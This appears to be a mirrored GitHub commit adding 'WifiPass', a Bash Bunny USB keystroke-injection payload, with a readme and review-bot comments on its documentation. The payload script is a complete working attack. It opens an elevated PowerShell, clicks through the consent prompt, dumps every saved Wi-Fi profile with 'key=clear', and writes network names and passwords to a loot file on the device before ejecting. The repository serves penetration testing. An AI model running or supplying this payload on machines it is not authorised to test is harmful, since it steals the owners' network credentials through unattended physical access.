mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Added WifiPass payload (#212)
* WifiPass payload
  Based on the WiFiCreds payload, with a focus on WPA networks and wider OS scope.
* Lights
  Solid rather than blinking
* Extra comment
* Update payload.txt
* Create readme.md
* Update readme.md
* Update payload.txt
* Update readme.md
* Update readme.md
* Update readme.md
* Update readme.md
parent 4d9bfeedd3
commit 4e55aae0ac
103
payloads/library/credentials/WifiPass/payload.txt
Normal file
@ -0,0 +1,103 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: WifiPass
|
||||
# Author: TheRoninRunner
|
||||
# Props: illwill
|
||||
# Version: 1.0
|
||||
# Target: Windows
|
||||
#
|
||||
# Uses the power of netsh to get a list of all wifi networks and passwords
|
||||
# stored on the computer. Windows 7 has some weird formatting issues with the
|
||||
# loot file.
|
||||
#
|
||||
# Tested and working on Windows 7, 8.1, and 10.
|
||||
#
|
||||
# Goes through the netsh wlan show profiles and runs each with key=clear,
|
||||
# saving any networks/keys that aren't open or WEP. For any network that
|
||||
# users username and password to log in, you'll get the network name only.
|
||||
#
|
||||
# Blue --- Setup
|
||||
# Yellow --- Using networks.txt to run through the networks
|
||||
# White --- Clean up
|
||||
# Green --- Done
|
||||
#
|
||||
|
||||
LED B
|
||||
|
||||
#Creates the loot directory
|
||||
mkdir -p /root/udisk/loot/WifiPass
|
||||
|
||||
#Set up the Bash Bunny and get the networks and computer name
|
||||
ATTACKMODE HID STORAGE
|
||||
Q DELAY 2000
|
||||
Q GUI
|
||||
Q DELAY 500
|
||||
Q STRING powershell
|
||||
Q DELAY 2000
|
||||
Q CTRL-SHIFT ENTER
|
||||
Q DELAY 2000
|
||||
Q LEFTARROW
|
||||
Q DELAY 200
|
||||
Q ENTER
|
||||
Q DELAY 1200
|
||||
Q STRING \$bb \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$compname \= \(\$env\:computername\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \(netsh wlan show profiles \| Out-File \$bb\\loot\\WifiPass\\networks.txt\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
#Types out commands to get the Wifi names and passwords, as well as store them
|
||||
LED Y
|
||||
Q STRING \(\$lines \= Get-Content \$bb\\loot\\WifiPass\\networks.txt\)
|
||||
Q ENTER
|
||||
Q STRING foreach \(\$line in \$lines\) \{
|
||||
Q ENTER
|
||||
Q STRING \$fields \= \$line -split \'\: \'
|
||||
Q ENTER
|
||||
Q STRING \$names \= \$fields\[1\]
|
||||
Q ENTER
|
||||
Q STRING foreach \(\$name in \$names\)\{
|
||||
Q ENTER
|
||||
Q STRING \$passwd = netsh wlan show profile \$name key\=clear \| findstr Key
|
||||
Q ENTER
|
||||
Q STRING \$pass \= \$passwd -split \'\: \'
|
||||
Q ENTER
|
||||
Q STRING if \(-Not \(\$pass -eq \1\)\) \{
|
||||
Q ENTER
|
||||
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$name
|
||||
Q ENTER
|
||||
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$pass\[1\]
|
||||
Q ENTER
|
||||
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \`n
|
||||
Q ENTER
|
||||
Q STRING }
|
||||
Q ENTER
|
||||
Q STRING }
|
||||
Q ENTER
|
||||
Q STRING }
|
||||
Q ENTER
|
||||
Q ENTER
|
||||
Q DELAY 10000
|
||||
|
||||
# Eject the USB Safely and remove networks file
|
||||
LED W
|
||||
Q STRING \$Eject \= New-Object -comObject Shell.Application
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$bb\).InvokeVerb\(\"Eject\"\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# GTFO
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
#Sync Drive
|
||||
sync
|
||||
rm -f /root/udisk/loot/WifiPass/networks.txt
|
||||
|
||||
#Trap is clean
|
||||
LED G
|
||||
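Review bot: The header comment block does not document the elevation step that the setup section depends on. `Q CTRL-SHIFT ENTER` followed by `Q LEFTARROW` and `Q ENTER` appears to launch PowerShell elevated and confirm the consent prompt, yet the header only says `# Target: Windows`. Please add a requirements line stating that the payload needs an unlocked session for a user who can elevate, and that the fixed `Q DELAY` values assume the prompt appears within that time. Two smaller points in the same block: `# users username and password to log in` should read "uses a username and password", and the header should say that recovered keys are written in cleartext to `$compname.txt` under `loot\WifiPass` on the storage volume, so anyone handling the device afterwards knows what it holds.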
23
payloads/library/credentials/WifiPass/readme.md
Normal file
@ -0,0 +1,23 @@
|
||||
# WifiPass
|
||||
* Author: TheRoninRunner
|
||||
* Version: Version 1.0
|
||||
* Props: illwill
|
||||
* Target: Windows
|
||||
* Working on Windows 7, 8.1, and 10
|
||||
|
||||
## About
|
||||
A bit of a fork from WiFiCreds, this uses the same Powershell attack to get wifi networks and their passwords.
|
||||
|
||||
WifiPass starts with getting the list of wireless networks saved on the device, storing those to a file. With a little bit of logic, it runs through the networks, only saving out networks that have a Key Content of anything besides 1 (1 being used in the case of WEP and open networks). *NOTE: this will give you network names of university/college networks that pass user accounts to log into them. They won't give you the password with this attack.*
|
||||
|
||||
It stores all those in a loot file with the name of the computer. Eject, sync, Ghostbusters reference, then you're good to go.
|
||||
|
||||
# No Configuration needed
|
||||
|
||||
## Lights
|
||||
| LED | Status |
|
||||
|---|---|
|
||||
| Blue | Creating loot dir and getting network names |
|
||||
| Yellow | Looking through networks |
|
||||
| White | Eject drive, sync, and remove network file |
|
||||
| Green | Finished |
|
||||
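Review bot: `# No Configuration needed` is written as a top-level heading in the middle of a document whose other sections use `##`, so it renders as a second page title. Suggest `## Configuration` with a one-line body saying none is needed. In the metadata list, `* Version: Version 1.0` repeats the word "Version". The About section should also state the requirement that payload.txt implies but the readme never mentions: the keystrokes open an elevated PowerShell, so the target session must belong to a user who can elevate. It would help to note as well that the loot file named after the computer holds the keys in cleartext.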